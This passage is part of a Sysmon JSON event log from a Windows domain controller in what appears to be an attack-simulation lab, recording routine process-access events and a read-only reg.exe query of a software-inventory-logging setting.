07:54:08.402","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2699,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.402\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.402","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2700,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.402\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.402","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2701,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.402\r\nSourceProcessGUID: {41C8662E-1FA0-5F25-0000-00107BD50400}\r\nSourceProcessId: 4936\r\nSourceThreadId: 4956\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FA0-5F25-0000-001072D70400}\r\nTargetProcessId: 4976\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.402","SourceProcessGUID":"{41C8662E-1FA0-5F25-0000-00107BD50400}","SourceProcessId":"4936","SourceThreadId":"4956","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FA0-5F25-0000-001072D70400}","TargetProcessId":"4976","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2702,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.415\r\nProcessGuid: {41C8662E-1FA0-5F25-0000-001032D80400}\r\nProcessId: 4988\r\nImage: C:\\Windows\\System32\\reg.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Registry Console Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: reg.exe\r\nCommandLine: C:\\Windows\\system32\\reg.exe  query hklm\\software\\microsoft\\windows\\softwareinventorylogging /v collectionstate /reg:64\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352\r\nParentProcessGuid: {41C8662E-1FA0-5F25-0000-001072D70400}\r\nParentProcessId: 4976\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c C:\\Windows\\system32\\reg.exe query hklm\\software\\microsoft\\windows\\softwareinventorylogging /v collectionstate /reg:64","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.415","ProcessGuid":"{41C8662E-1FA0-5F25-0000-001032D80400}","Image":"C:\\Windows\\System32\\reg.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Registry Console Tool","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"reg.exe","CommandLine":"C:\\Windows\\system32\\reg.exe  query hklm\\software\\microsoft\\windows\\softwareinventorylogging /v collectionstate /reg:64","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352","ParentProcessGuid":"{41C8662E-1FA0-5F25-0000-001072D70400}","ParentProcessId":"4976","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c C:\\Windows\\system32\\reg.exe query hklm\\software\\microsoft\\windows\\softwareinventorylogging /v collectionstate /reg:64","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2703,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.417\r\nSourceProcessGUID: {41C8662E-1FA0-5F25-0000-001072D70400}\r\nSourceProcessId: 4976\r\nSourceThreadId: 4980\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-1FA0-5F25-0000-001032D80400}\r\nTargetProcessId: 4988\r\nTargetImage: C:\\Windows\\system32\\reg.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.417","SourceProcessGUID":"{41C8662E-1FA0-5F25-0000-001072D70400}","SourceProcessId":"4976","SourceThreadId":"4980","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-1FA0-5F25-0000-001032D80400}","TargetProcessId":"4988","TargetImage":"C:\\Windows\\system32\\reg.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2704,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.417\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FA0-5F25-0000-001032D80400}\r\nTargetProcessId: 4988\r\nTargetImage: C:\\Windows\\system32\\reg.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.417","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FA0-5F25-0000-001032D80400}","TargetProcessId":"4988","TargetImage":"C:\\Windows\\system32\\reg.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2705,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.417\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.417","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2706,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.417\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:08.417","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2707,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:08.417\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 